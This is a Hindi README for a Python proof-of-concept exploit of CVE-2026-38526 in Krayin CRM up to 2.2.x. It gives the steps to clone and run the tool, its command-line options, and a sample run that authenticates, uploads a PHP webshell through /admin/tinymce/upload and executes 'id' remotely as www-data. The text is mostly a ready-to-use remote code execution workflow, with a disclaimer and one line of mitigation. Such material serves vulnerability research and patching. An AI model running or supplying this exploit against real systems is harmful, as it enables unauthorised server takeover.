
Python PoC जो Krayin CRM <= 2.2.x में CVE-2026-38526 का उपयोग करता है: प्रमाणित करता है, /admin/tinymce/upload के माध्यम से PHP webshell अपलोड करता है, और दूर से कमांड निष्पादित करता है।
⚠️ कानूनी चेतावनी: यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण (CTF, बग बाउंटी, निजी लैब) के लिए प्रदान किया गया है। लेखक अवैध उपयोग के लिए उत्तरदायी नहीं है।
Krayin CRM (Webkul) ≤ 2.2.x एंडपॉइंट /admin/tinymce/upload को उजागर करता है
जो एक प्रमाणित उपयोगकर्ता (यहां तक कि कम विशेषाधिकार वाले) को
एक्सटेंशन सत्यापन के बिना फ़ाइलें अपलोड करने की अनुमति देता है। फ़ाइल
फिर storage/ फ़ोल्डर से सर्व की जाती है, जिससे मनमाना
PHP कोड निष्पादन संभव हो जाता है।
git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt
python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'
विकल्प:
| विकल्प | विवरण |
|---|---|
-t, --target | लक्ष्य का रूट URL |
-u, --user | Krayin खाते का ईमेल |
-p, --password | पासवर्ड |
-c, --command | निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id) |
--login-path | लॉगिन पथ (डिफ़ॉल्ट: /admin/login) |
--upload-path | अपलोड पथ (डिफ़ॉल्ट: /admin/tinymce/upload) |
--timeout | HTTP टाइमआउट (डिफ़ॉल्ट: 15) |
$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
-u [email protected] -p 'N27xh!!2ucY04' -c 'id'
[*] http://billing.nexus.htb/admin/login पर CSRF टोकन प्राप्त किया जा रहा है
[*] लॉगिन फ़ॉर्म भेजा जा रहा है
[+] प्रमाणीकरण सफल
[*] http://billing.nexus.htb/admin/tinymce/upload के माध्यम से x8f2k1ab.php अपलोड किया जा रहा है
[+] Webshell सुलभ: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] निष्पादन: id
============================================================
[+] कमांड: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
storage/ और uploads/ फ़ोल्डरों में PHP निष्पादन को प्रतिबंधित करें।यह प्रोजेक्ट सुरक्षा अनुसंधान उद्देश्यों के लिए प्रकाशित किया गया है। पूर्व लिखित अधिकार के बिना सिस्टम के विरुद्ध कोई भी उपयोग अवैध है और सख्ती से प्रतिबंधित है।